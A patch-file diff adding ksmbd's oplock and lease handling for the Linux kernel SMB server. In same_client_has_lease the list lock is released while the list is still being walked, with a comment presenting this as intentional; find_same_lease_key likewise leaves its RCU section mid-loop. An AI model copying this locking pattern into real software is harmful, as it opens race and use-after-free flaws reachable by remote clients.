++	list_add_rcu(&opinfo->op_entry, &ci->m_op_list);
++	write_unlock(&ci->m_lock);
++}
++
++static void opinfo_del(struct oplock_info *opinfo)
++{
++	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
++
++	if (opinfo->is_lease) {
++		write_lock(&lease_list_lock);
++		lease_del_list(opinfo);
++		write_unlock(&lease_list_lock);
++	}
++	write_lock(&ci->m_lock);
++	list_del_rcu(&opinfo->op_entry);
++	write_unlock(&ci->m_lock);
++}
++
++static unsigned long opinfo_count(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		return atomic_read(&fp->f_ci->sop_count);
++	else
++		return atomic_read(&fp->f_ci->op_count);
++}
++
++static void opinfo_count_inc(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		atomic_inc(&fp->f_ci->sop_count);
++	else
++		atomic_inc(&fp->f_ci->op_count);
++}
++
++static void opinfo_count_dec(struct ksmbd_file *fp)
++{
++	if (ksmbd_stream_fd(fp))
++		atomic_dec(&fp->f_ci->sop_count);
++	else
++		atomic_dec(&fp->f_ci->op_count);
++}
++
++/**
++ * opinfo_write_to_read() - convert a write oplock to read oplock
++ * @opinfo:		current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_write_to_read(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_II;
++
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * opinfo_read_handle_to_read() - convert a read/handle oplock to read oplock
++ * @opinfo:		current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_read_handle_to_read(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	lease->state = lease->new_state;
++	opinfo->level = SMB2_OPLOCK_LEVEL_II;
++	return 0;
++}
++
++/**
++ * opinfo_write_to_none() - convert a write oplock to none
++ * @opinfo:	current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_write_to_none(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * opinfo_read_to_none() - convert a read oplock to none
++ * @opinfo:	current oplock info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int opinfo_read_to_none(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (opinfo->level != SMB2_OPLOCK_LEVEL_II) {
++		pr_err("bad oplock(0x%x)\n", opinfo->level);
++		if (opinfo->is_lease)
++			pr_err("lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	if (opinfo->is_lease)
++		lease->state = lease->new_state;
++	return 0;
++}
++
++/**
++ * lease_read_to_write() - upgrade lease state from read to write
++ * @opinfo:	current lease info
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++int lease_read_to_write(struct oplock_info *opinfo)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(lease->state & SMB2_LEASE_READ_CACHING_LE)) {
++		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++
++	lease->new_state = SMB2_LEASE_NONE_LE;
++	lease->state |= SMB2_LEASE_WRITE_CACHING_LE;
++	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++		opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
++	else
++		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	return 0;
++}
++
++/**
++ * lease_none_upgrade() - upgrade lease state from none
++ * @opinfo:	current lease info
++ * @new_state:	new lease state
++ *
++ * Return:	0 on success, otherwise -EINVAL
++ */
++static int lease_none_upgrade(struct oplock_info *opinfo, __le32 new_state)
++{
++	struct lease *lease = opinfo->o_lease;
++
++	if (!(lease->state == SMB2_LEASE_NONE_LE)) {
++		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
++		return -EINVAL;
++	}
++
++	lease->new_state = SMB2_LEASE_NONE_LE;
++	lease->state = new_state;
++	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE) {
++		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++			opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
++		else
++			opinfo->level = SMB2_OPLOCK_LEVEL_II;
++	} else if (lease->state & SMB2_LEASE_WRITE_CACHING_LE) {
++		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	} else if (lease->state & SMB2_LEASE_READ_CACHING_LE) {
++		opinfo->level = SMB2_OPLOCK_LEVEL_II;
++	}
++
++	return 0;
++}
++
++/**
++ * close_id_del_oplock() - release oplock object at file close time
++ * @fp:		ksmbd file pointer
++ */
++void close_id_del_oplock(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++
++	if (S_ISDIR(file_inode(fp->filp)->i_mode))
++		return;
++
++	opinfo = opinfo_get(fp);
++	if (!opinfo)
++		return;
++
++	opinfo_del(opinfo);
++
++	rcu_assign_pointer(fp->f_opinfo, NULL);
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		opinfo->op_state = OPLOCK_CLOSING;
++		wake_up_interruptible_all(&opinfo->oplock_q);
++		if (opinfo->is_lease) {
++			atomic_set(&opinfo->breaking_cnt, 0);
++			wake_up_interruptible_all(&opinfo->oplock_brk);
++		}
++	}
++
++	opinfo_count_dec(fp);
++	atomic_dec(&opinfo->refcount);
++	opinfo_put(opinfo);
++}
++
++/**
++ * grant_write_oplock() - grant exclusive/batch oplock or write lease
++ * @opinfo_new:	new oplock info object
++ * @req_oplock: request oplock
++ * @lctx:	lease context information
++ */
++static void grant_write_oplock(struct oplock_info *opinfo_new, int req_oplock,
++			       struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	if (req_oplock == SMB2_OPLOCK_LEVEL_BATCH)
++		opinfo_new->level = SMB2_OPLOCK_LEVEL_BATCH;
++	else
++		opinfo_new->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++
++	if (lctx) {
++		lease->state = lctx->req_state;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++/**
++ * grant_read_oplock() - grant level2 oplock or read lease
++ * @opinfo_new:	new oplock info object
++ * @lctx:	lease context information
++ */
++static void grant_read_oplock(struct oplock_info *opinfo_new,
++			      struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	opinfo_new->level = SMB2_OPLOCK_LEVEL_II;
++
++	if (lctx) {
++		lease->state = SMB2_LEASE_READ_CACHING_LE;
++		if (lctx->req_state & SMB2_LEASE_HANDLE_CACHING_LE)
++			lease->state |= SMB2_LEASE_HANDLE_CACHING_LE;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++/**
++ * grant_none_oplock() - grant none oplock or none lease
++ * @opinfo_new:	new oplock info object
++ * @lctx:	lease context information
++ */
++static void grant_none_oplock(struct oplock_info *opinfo_new,
++			      struct lease_ctx_info *lctx)
++{
++	struct lease *lease = opinfo_new->o_lease;
++
++	opinfo_new->level = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (lctx) {
++		lease->state = 0;
++		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	}
++}
++
++static inline int compare_guid_key(struct oplock_info *opinfo,
++				   const char *guid1, const char *key1)
++{
++	const char *guid2, *key2;
++
++	guid2 = opinfo->conn->ClientGUID;
++	key2 = opinfo->o_lease->lease_key;
++	if (!memcmp(guid1, guid2, SMB2_CLIENT_GUID_SIZE) &&
++	    !memcmp(key1, key2, SMB2_LEASE_KEY_SIZE))
++		return 1;
++
++	return 0;
++}
++
++/**
++ * same_client_has_lease() - check whether current lease request is
++ *		from lease owner of file
++ * @ci:		ksmbd inode pointer of the target file
++ * @client_guid:	Client GUID
++ * @lctx:		lease context information
++ *
++ * Return:      oplock(lease) object on success, otherwise NULL
++ */
++static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
++						 char *client_guid,
++						 struct lease_ctx_info *lctx)
++{
++	int ret;
++	struct lease *lease;
++	struct oplock_info *opinfo;
++	struct oplock_info *m_opinfo = NULL;
++
++	if (!lctx)
++		return NULL;
++
++	/*
++	 * Compare the lease key and client_guid to determine whether the
++	 * request comes from the same lease owner on the same client.
++	 */
++	read_lock(&ci->m_lock);
++	list_for_each_entry(opinfo, &ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++		read_unlock(&ci->m_lock);
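++		/* m_lock is dropped while this lease is examined; retaken below. */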
++		lease = opinfo->o_lease;
++
++		ret = compare_guid_key(opinfo, client_guid, lctx->lease_key);
++		if (ret) {
++			m_opinfo = opinfo;
++			/* skip upgrading a lease that is currently being broken */
++			if (atomic_read(&opinfo->breaking_cnt)) {
++				read_lock(&ci->m_lock);
++				continue;
++			}
++
++			/* upgrading lease */
++			if ((atomic_read(&ci->op_count) +
++			     atomic_read(&ci->sop_count)) == 1) {
++				if (lease->state ==
++				    (lctx->req_state & lease->state)) {
++					lease->state |= lctx->req_state;
++					if (lctx->req_state &
++						SMB2_LEASE_WRITE_CACHING_LE)
++						lease_read_to_write(opinfo);
++				}
++			} else if ((atomic_read(&ci->op_count) +
++				    atomic_read(&ci->sop_count)) > 1) {
++				if (lctx->req_state ==
++				    (SMB2_LEASE_READ_CACHING_LE |
++				     SMB2_LEASE_HANDLE_CACHING_LE))
++					lease->state = lctx->req_state;
++			}
++
++			if (lctx->req_state && lease->state ==
++			    SMB2_LEASE_NONE_LE)
++				lease_none_upgrade(opinfo, lctx->req_state);
++		}
++		read_lock(&ci->m_lock);
++	}
++	read_unlock(&ci->m_lock);
++
++	return m_opinfo;
++}
++
++static void wait_for_break_ack(struct oplock_info *opinfo)
++{
++	int rc = 0;
++
++	rc = wait_event_interruptible_timeout(opinfo->oplock_q,
++					      opinfo->op_state == OPLOCK_STATE_NONE ||
++					      opinfo->op_state == OPLOCK_CLOSING,
++					      OPLOCK_WAIT_TIME);
++
++	/* is this a timeout ? */
++	if (!rc) {
++		if (opinfo->is_lease)
++			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
++		opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++		opinfo->op_state = OPLOCK_STATE_NONE;
++	}
++}
++
++static void wake_up_oplock_break(struct oplock_info *opinfo)
++{
++	clear_bit_unlock(0, &opinfo->pending_break);
++	/* memory barrier is needed for wake_up_bit() */
++	smp_mb__after_atomic();
++	wake_up_bit(&opinfo->pending_break, 0);
++}
++
++static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
++{
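++	/*
++	 * Bit 0 of pending_break serializes break notifications so that
++	 * only one break per opinfo is in flight at a time.
++	 */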
++	while (test_and_set_bit(0, &opinfo->pending_break)) {
++		wait_on_bit(&opinfo->pending_break, 0, TASK_UNINTERRUPTIBLE);
++
++		/* Do not immediately break to none. */
++		opinfo->open_trunc = 0;
++
++		if (opinfo->op_state == OPLOCK_CLOSING)
++			return -ENOENT;
++		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
++			return 1;
++	}
++
++	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
++		wake_up_oplock_break(opinfo);
++		return 1;
++	}
++	return 0;
++}
++
++static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
++	if (!work->response_buf)
++		return -ENOMEM;
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	return 0;
++}
++
++/**
++ * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
++ * to client
++ * @wk:     smb work object
++ *
++ * There are two ways this function can be called: 1) on file open, breaking
++ * from an exclusive/batch oplock to a level II oplock, and 2) on file
++ * write/truncate, breaking from a level II oplock to no oplock.
++ * work->request_buf contains oplock_info.
++ */
++static void __smb2_oplock_break_noti(struct work_struct *wk)
++{
++	struct smb2_oplock_break *rsp = NULL;
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct ksmbd_conn *conn = work->conn;
++	struct oplock_break_info *br_info = work->request_buf;
++	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_file *fp;
++
++	fp = ksmbd_lookup_durable_fd(br_info->fid);
++	if (!fp)
++		goto out;
++
++	if (allocate_oplock_break_buf(work)) {
++		pr_err("allocate_oplock_break_buf failed!\n");
++		ksmbd_fd_put(work, fp);
++		goto out;
++	}
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(0);
++	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = cpu_to_le64(-1);
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++
++	rsp->StructureSize = cpu_to_le16(24);
++	if (!br_info->open_trunc &&
++	    (br_info->level == SMB2_OPLOCK_LEVEL_BATCH ||
++	     br_info->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_II;
++	else
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++	rsp->Reserved = 0;
++	rsp->Reserved2 = 0;
++	rsp->PersistentFid = fp->persistent_id;
++	rsp->VolatileFid = fp->volatile_id;
++
++	inc_rfc1001_len(work->response_buf, 24);
++
++	ksmbd_debug(OPLOCK,
++		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
++		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
++
++	ksmbd_fd_put(work, fp);
++	ksmbd_conn_write(work);
++
++out:
++	ksmbd_free_work_struct(work);
++}
++
++/**
++ * smb2_oplock_break_noti() - send smb2 exclusive/batch to level2 oplock
++ *		break command from server to client
++ * @opinfo:		oplock info object
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb2_oplock_break_noti(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn = opinfo->conn;
++	struct oplock_break_info *br_info;
++	int ret = 0;
++	struct ksmbd_work *work = ksmbd_alloc_work_struct();
++
++	if (!work)
++		return -ENOMEM;
++
++	br_info = kmalloc(sizeof(struct oplock_break_info), GFP_KERNEL);
++	if (!br_info) {
++		ksmbd_free_work_struct(work);
++		return -ENOMEM;
++	}
++
++	br_info->level = opinfo->level;
++	br_info->fid = opinfo->fid;
++	br_info->open_trunc = opinfo->open_trunc;
++
++	work->request_buf = (char *)br_info;
++	work->conn = conn;
++	work->sess = opinfo->sess;
++
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		INIT_WORK(&work->work, __smb2_oplock_break_noti);
++		ksmbd_queue_work(work);
++
++		wait_for_break_ack(opinfo);
++	} else {
++		__smb2_oplock_break_noti(&work->work);
++		if (opinfo->level == SMB2_OPLOCK_LEVEL_II)
++			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	}
++	return ret;
++}
++
++/**
++ * __smb2_lease_break_noti() - send lease break command from server
++ * to client
++ * @wk:     smb work object
++ */
++static void __smb2_lease_break_noti(struct work_struct *wk)
++{
++	struct smb2_lease_break *rsp = NULL;
++	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
++	struct lease_break_info *br_info = work->request_buf;
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *rsp_hdr;
++
++	if (allocate_oplock_break_buf(work)) {
++		ksmbd_debug(OPLOCK, "allocate_oplock_break_buf failed!\n");
++		goto out;
++	}
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->CreditRequest = cpu_to_le16(0);
++	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = cpu_to_le64(-1);
++	rsp_hdr->Id.SyncId.ProcessId = 0;
++	rsp_hdr->Id.SyncId.TreeId = 0;
++	rsp_hdr->SessionId = 0;
++	memset(rsp_hdr->Signature, 0, 16);
++
++	rsp = smb2_get_msg(work->response_buf);
++	rsp->StructureSize = cpu_to_le16(44);
++	rsp->Epoch = br_info->epoch;
++	rsp->Flags = 0;
++
++	if (br_info->curr_state & (SMB2_LEASE_WRITE_CACHING_LE |
++			SMB2_LEASE_HANDLE_CACHING_LE))
++		rsp->Flags = SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED;
++
++	memcpy(rsp->LeaseKey, br_info->lease_key, SMB2_LEASE_KEY_SIZE);
++	rsp->CurrentLeaseState = br_info->curr_state;
++	rsp->NewLeaseState = br_info->new_state;
++	rsp->BreakReason = 0;
++	rsp->AccessMaskHint = 0;
++	rsp->ShareMaskHint = 0;
++
++	inc_rfc1001_len(work->response_buf, 44);
++
++	ksmbd_conn_write(work);
++
++out:
++	ksmbd_free_work_struct(work);
++}
++
++/**
++ * smb2_lease_break_noti() - break a lease when a new client requests
++ *			a write lease
++ * @opinfo:		contains lease state information
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_lease_break_noti(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn = opinfo->conn;
++	struct list_head *tmp, *t;
++	struct ksmbd_work *work;
++	struct lease_break_info *br_info;
++	struct lease *lease = opinfo->o_lease;
++
++	work = ksmbd_alloc_work_struct();
++	if (!work)
++		return -ENOMEM;
++
++	br_info = kmalloc(sizeof(struct lease_break_info), GFP_KERNEL);
++	if (!br_info) {
++		ksmbd_free_work_struct(work);
++		return -ENOMEM;
++	}
++
++	br_info->curr_state = lease->state;
++	br_info->new_state = lease->new_state;
++	if (lease->version == 2)
++		br_info->epoch = cpu_to_le16(++lease->epoch);
++	else
++		br_info->epoch = 0;
++	memcpy(br_info->lease_key, lease->lease_key, SMB2_LEASE_KEY_SIZE);
++
++	work->request_buf = (char *)br_info;
++	work->conn = conn;
++	work->sess = opinfo->sess;
++
++	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
++		list_for_each_safe(tmp, t, &opinfo->interim_list) {
++			struct ksmbd_work *in_work;
++
++			in_work = list_entry(tmp, struct ksmbd_work,
++					     interim_entry);
++			setup_async_work(in_work, NULL, NULL);
++			smb2_send_interim_resp(in_work, STATUS_PENDING);
++			list_del(&in_work->interim_entry);
++		}
++		INIT_WORK(&work->work, __smb2_lease_break_noti);
++		ksmbd_queue_work(work);
++		wait_for_break_ack(opinfo);
++	} else {
++		__smb2_lease_break_noti(&work->work);
++		if (opinfo->o_lease->new_state == SMB2_LEASE_NONE_LE) {
++			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
++		}
++	}
++	return 0;
++}
++
++static void wait_lease_breaking(struct oplock_info *opinfo)
++{
++	if (!opinfo->is_lease)
++		return;
++
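++	/* Give any in-flight lease breaks up to one second (HZ) to finish. */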
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++	if (atomic_read(&opinfo->breaking_cnt)) {
++		int ret = 0;
++
++		ret = wait_event_interruptible_timeout(opinfo->oplock_brk,
++						       atomic_read(&opinfo->breaking_cnt) == 0,
++						       HZ);
++		if (!ret)
++			atomic_set(&opinfo->breaking_cnt, 0);
++	}
++}
++
++static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
++{
++	int err = 0;
++
++	/* Need to break exclusive/batch oplock, write lease or overwrite_if */
++	ksmbd_debug(OPLOCK,
++		    "request to send oplock(level : 0x%x) break notification\n",
++		    brk_opinfo->level);
++
++	if (brk_opinfo->is_lease) {
++		struct lease *lease = brk_opinfo->o_lease;
++
++		atomic_inc(&brk_opinfo->breaking_cnt);
++
++		err = oplock_break_pending(brk_opinfo, req_op_level);
++		if (err)
++			return err < 0 ? err : 0;
++
++		if (brk_opinfo->open_trunc) {
++			/*
++			 * A create with an overwrite disposition triggers the
++			 * lease break to none.
++			 */
++			lease->new_state = SMB2_LEASE_NONE_LE;
++		} else {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE) {
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE |
++						SMB2_LEASE_HANDLE_CACHING_LE;
++				else
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE;
++			} else {
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++					lease->new_state =
++						SMB2_LEASE_READ_CACHING_LE;
++				else
++					lease->new_state = SMB2_LEASE_NONE_LE;
++			}
++		}
++
++		if (lease->state & (SMB2_LEASE_WRITE_CACHING_LE |
++				SMB2_LEASE_HANDLE_CACHING_LE))
++			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
++		else
++			atomic_dec(&brk_opinfo->breaking_cnt);
++	} else {
++		err = oplock_break_pending(brk_opinfo, req_op_level);
++		if (err)
++			return err < 0 ? err : 0;
++
++		if (brk_opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
++		    brk_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
++			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
++	}
++
++	if (brk_opinfo->is_lease)
++		err = smb2_lease_break_noti(brk_opinfo);
++	else
++		err = smb2_oplock_break_noti(brk_opinfo);
++
++	ksmbd_debug(OPLOCK, "oplock granted = %d\n", brk_opinfo->level);
++	if (brk_opinfo->op_state == OPLOCK_CLOSING)
++		err = -ENOENT;
++	wake_up_oplock_break(brk_opinfo);
++
++	wait_lease_breaking(brk_opinfo);
++
++	return err;
++}
++
++void destroy_lease_table(struct ksmbd_conn *conn)
++{
++	struct lease_table *lb, *lbtmp;
++	struct oplock_info *opinfo;
++
++	write_lock(&lease_list_lock);
++	if (list_empty(&lease_table_list)) {
++		write_unlock(&lease_list_lock);
++		return;
++	}
++
++	list_for_each_entry_safe(lb, lbtmp, &lease_table_list, l_entry) {
++		if (conn && memcmp(lb->client_guid, conn->ClientGUID,
++				   SMB2_CLIENT_GUID_SIZE))
++			continue;
++again:
++		rcu_read_lock();
++		list_for_each_entry_rcu(opinfo, &lb->lease_list,
++					lease_entry) {
++			rcu_read_unlock();
++			lease_del_list(opinfo);
++			goto again;
++		}
++		rcu_read_unlock();
++		list_del(&lb->l_entry);
++		kfree(lb);
++	}
++	write_unlock(&lease_list_lock);
++}
++
++int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
++			struct lease_ctx_info *lctx)
++{
++	struct oplock_info *opinfo;
++	int err = 0;
++	struct lease_table *lb;
++
++	if (!lctx)
++		return err;
++
++	read_lock(&lease_list_lock);
++	if (list_empty(&lease_table_list)) {
++		read_unlock(&lease_list_lock);
++		return 0;
++	}
++
++	list_for_each_entry(lb, &lease_table_list, l_entry) {
++		if (!memcmp(lb->client_guid, sess->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE))
++			goto found;
++	}
++	read_unlock(&lease_list_lock);
++
++	return 0;
++
++found:
++	rcu_read_lock();
++	list_for_each_entry_rcu(opinfo, &lb->lease_list, lease_entry) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			continue;
++		rcu_read_unlock();
++		if (opinfo->o_fp->f_ci == ci)
++			goto op_next;
++		err = compare_guid_key(opinfo, sess->ClientGUID,
++				       lctx->lease_key);
++		if (err) {
++			err = -EINVAL;
++			ksmbd_debug(OPLOCK,
++				    "found same lease key is already used in other files\n");
++			opinfo_put(opinfo);
++			goto out;
++		}
++op_next:
++		opinfo_put(opinfo);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++out:
++	read_unlock(&lease_list_lock);
++	return err;
++}
++
++static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
++{
++	struct lease *lease1 = op1->o_lease;
++	struct lease *lease2 = op2->o_lease;
++
++	op2->level = op1->level;
++	lease2->state = lease1->state;
++	memcpy(lease2->lease_key, lease1->lease_key,
++	       SMB2_LEASE_KEY_SIZE);
++	lease2->duration = lease1->duration;
++	lease2->flags = lease1->flags;
++}
++
++static int add_lease_global_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb;
++
++	read_lock(&lease_list_lock);
++	list_for_each_entry(lb, &lease_table_list, l_entry) {
++		if (!memcmp(lb->client_guid, opinfo->conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE)) {
++			opinfo->o_lease->l_lb = lb;
++			lease_add_list(opinfo);
++			read_unlock(&lease_list_lock);
++			return 0;
++		}
++	}
++	read_unlock(&lease_list_lock);
++
++	lb = kmalloc(sizeof(struct lease_table), GFP_KERNEL);
++	if (!lb)
++		return -ENOMEM;
++
++	memcpy(lb->client_guid, opinfo->conn->ClientGUID,
++	       SMB2_CLIENT_GUID_SIZE);
++	INIT_LIST_HEAD(&lb->lease_list);
++	spin_lock_init(&lb->lb_lock);
++	opinfo->o_lease->l_lb = lb;
++	lease_add_list(opinfo);
++	lb_add(lb);
++	return 0;
++}
++
++static void set_oplock_level(struct oplock_info *opinfo, int level,
++			     struct lease_ctx_info *lctx)
++{
++	switch (level) {
++	case SMB2_OPLOCK_LEVEL_BATCH:
++	case SMB2_OPLOCK_LEVEL_EXCLUSIVE:
++		grant_write_oplock(opinfo, level, lctx);
++		break;
++	case SMB2_OPLOCK_LEVEL_II:
++		grant_read_oplock(opinfo, lctx);
++		break;
++	default:
++		grant_none_oplock(opinfo, lctx);
++		break;
++	}
++}
++
++/**
++ * smb_grant_oplock() - handle oplock/lease request on file open
++ * @work:		smb work
++ * @req_op_level:	oplock level
++ * @pid:		id of open file
++ * @fp:			ksmbd file pointer
++ * @tid:		Tree id of connection
++ * @lctx:		lease context information on file open
++ * @share_ret:		share mode
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
++		     struct ksmbd_file *fp, __u16 tid,
++		     struct lease_ctx_info *lctx, int share_ret)
++{
++	struct ksmbd_session *sess = work->sess;
++	int err = 0;
++	struct oplock_info *opinfo = NULL, *prev_opinfo = NULL;
++	struct ksmbd_inode *ci = fp->f_ci;
++	bool prev_op_has_lease;
++	__le32 prev_op_state = 0;
++
++	/* directory leases are not supported */
++	if (S_ISDIR(file_inode(fp->filp)->i_mode))
++		return 0;
++
++	opinfo = alloc_opinfo(work, pid, tid);
++	if (!opinfo)
++		return -ENOMEM;
++
++	if (lctx) {
++		err = alloc_lease(opinfo, lctx);
++		if (err)
++			goto err_out;
++		opinfo->is_lease = 1;
++	}
++
++	/* ci does not have any oplock */
++	if (!opinfo_count(fp))
++		goto set_lev;
++
++	/* grant no oplock if this open is attribute-only and does not truncate */
++	if (fp->attrib_only && fp->cdoption != FILE_OVERWRITE_IF_LE &&
++	    fp->cdoption != FILE_OVERWRITE_LE &&
++	    fp->cdoption != FILE_SUPERSEDE_LE) {
++		req_op_level = SMB2_OPLOCK_LEVEL_NONE;
++		goto set_lev;
++	}
++
++	if (lctx) {
++		struct oplock_info *m_opinfo;
++
++		/* is lease already granted ? */
++		m_opinfo = same_client_has_lease(ci, sess->ClientGUID,
++						 lctx);
++		if (m_opinfo) {
++			copy_lease(m_opinfo, opinfo);
++			if (atomic_read(&m_opinfo->breaking_cnt))
++				opinfo->o_lease->flags =
++					SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE;
++			goto out;
++		}
++	}
++	prev_opinfo = opinfo_get_list(ci);
++	if (!prev_opinfo ||
++	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
++		opinfo_conn_put(prev_opinfo);
++		goto set_lev;
++	}
++	prev_op_has_lease = prev_opinfo->is_lease;
++	if (prev_op_has_lease)
++		prev_op_state = prev_opinfo->o_lease->state;
++
++	if (share_ret < 0 &&
++	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		err = share_ret;
++		opinfo_conn_put(prev_opinfo);
++		goto err_out;
++	}
++
